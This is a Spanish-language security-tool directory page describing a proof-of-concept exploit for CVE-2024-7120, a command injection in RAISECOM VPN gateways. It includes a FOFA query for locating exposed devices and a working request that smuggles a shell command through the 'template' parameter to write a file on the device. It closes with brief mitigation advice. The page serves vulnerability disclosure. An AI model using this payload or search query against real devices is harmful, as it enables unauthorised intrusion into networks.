Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-7120-Exploit-by-Dark-07x — Prueba de concepto de exploit para CVE-2024-7120, inyección de comandos en dispositivos RAISECOM Gateway. Ejecuta comandos arbitrarios a través del parámetro template en list_base_config.php. | Kitploit
Herramientas/GitHubGitHub/jokeir07x/cve-2024-7120-exploit-by-dark-07x
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubjokeir07x/cve-2024-7120-exploit-by-dark-07x

CVE-2024-7120-Exploit-by-Dark-07x

Prueba de concepto de exploit para CVE-2024-7120, inyección de comandos en dispositivos RAISECOM Gateway. Ejecuta comandos arbitrarios a través del parámetro template en list_base_config.php.

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Raisecom Devices Inyección de Comandos (CVE-2024-7120) Prueba de concepto!

Resumen

Se ha identificado una vulnerabilidad de inyección de comandos en los dispositivos Gateway RAISECOM, afectando a los modelos MSG1200, MSG2100E, MSG2200 y MSG2300. Esta vulnerabilidad permite a atacantes remotos ejecutar comandos arbitrarios en el sistema a través de la interfaz web. El problema reside en el script list_base_config.php, específicamente a través del parámetro template, afectando a más de 25,112 dispositivos en Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

Componentes Afectados

URI: /vpn/list_base_config.php

Descripción: list_base_config.php es un componente de interfaz web de los dispositivos Gateway RAISECOM utilizado para gestionar configuraciones VPN. La vulnerabilidad identificada surge debido al manejo incorrecto del parámetro template en este script. Este parámetro puede ser explotado para ejecutar comandos arbitrarios en el sistema operativo del dispositivo debido a una sanitización insuficiente de las entradas.

CWE

CWE-77: Inyección de Comandos

Explotación

Aquí hay un ejemplo de cómo se puede explotar la vulnerabilidad usando un comando curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
  1. Validación de Entradas: Implemente comprobaciones de validación estrictas en todas las entradas del usuario, especialmente aquellas que puedan afectar comandos del sistema o rutas de archivos.
  2. Controles de Acceso: Restrinja el acceso a la interfaz web del dispositivo a redes de confianza y usuarios autenticados.
Descargar herramienta